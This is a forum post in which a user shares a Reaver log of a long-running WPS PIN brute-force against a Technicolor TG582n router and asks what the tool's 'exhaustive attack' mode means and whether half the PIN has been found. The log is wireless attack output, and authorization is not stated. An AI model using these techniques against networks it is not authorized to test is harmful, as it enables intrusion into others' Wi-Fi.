To mmusket33.
The mistery continue..
As you suggested I used kali 2.0 i386 persistent USB WITHOUT LUKS encryption and pin count advanced without restarts as expected, but after some days of work i had this unexpected log:
Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> mod by t6_x <[email protected]> & DataHead & Soxrok2212 [+] Switching mon0 to channel 1 [+] p1_index set to 6904 [+] p2_index set to 999 [+] Restored previous session [+] Waiting for beacon from XX:XX:XX:XX:XX:XX [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: TNCAPXXXXXX) [+] Starting Cracking Session. Pin count: 10999, Max pin attempts: 11000 [+] Trying pin 69019982. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: XXXXXXXXXXXXXXXXXXXX [P] PKE: XXXXXXXXXXXXXXXXXXXX [P] WPS Manufacturer: Technicolor [P] WPS Model Name: Technicolor TG [P] WPS Model Number: 582n [P] Access Point Serial Number: XXXXXXXXX [+] Received M1 message [P] R-Nonce: XXXXXXXXXXXXXXXXXXXX [P] PKR: XXXXXXXXXXXXXXXXXXXX [P] AuthKey: XXXXXXXXXXXXXXXXXXXX [+] Sending M2 message [P] E-Hash1: XXXXXXXXXXXXXXXXXXXX [P] E-Hash2: XXXXXXXXXXXXXXXXXXXX [+] Received M3 message [+] Sending M4 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [+] Received M3 message [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [+] p2_index set to 1000 [+] Pin count advanced: 11000. Max pin attempts: 11000 [+] Checksum mode was not successful. Starting exhaustive attack [+] p2_index set to 0 [+] Trying pin 69011234. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [P] E-Nonce: XXXXXXXXXXXXXXXXXXXX [P] PKE: XXXXXXXXXXXXXXXXXXXX [P] WPS Manufacturer: Technicolor [P] WPS Model Name: Technicolor TG [P] WPS Model Number: 582n [P] Access Point Serial Number: XXXXXXXXX [+] Received M1 message [P] R-Nonce: XXXXXXXXXXXXXXXXXXXX [P] PKR: XXXXXXXXXXXXXXXXXXXX [P] AuthKey: XXXXXXXXXXXXXXXXXXXX [+] Sending M2 message [+] Received M1 message [+] Received M1 message [P] E-Hash1: XXXXXXXXXXXXXXXXXXXX [P] E-Hash2: XXXXXXXXXXXXXXXXXXXX [+] Received M3 message [+] Sending M4 message [+] Session saved.
And p2 index restarted from 0.
I'm a Little bit confused now ..What it means exhaustive attack? And, according the log file it discovered only the first part (6901) of the pin right?
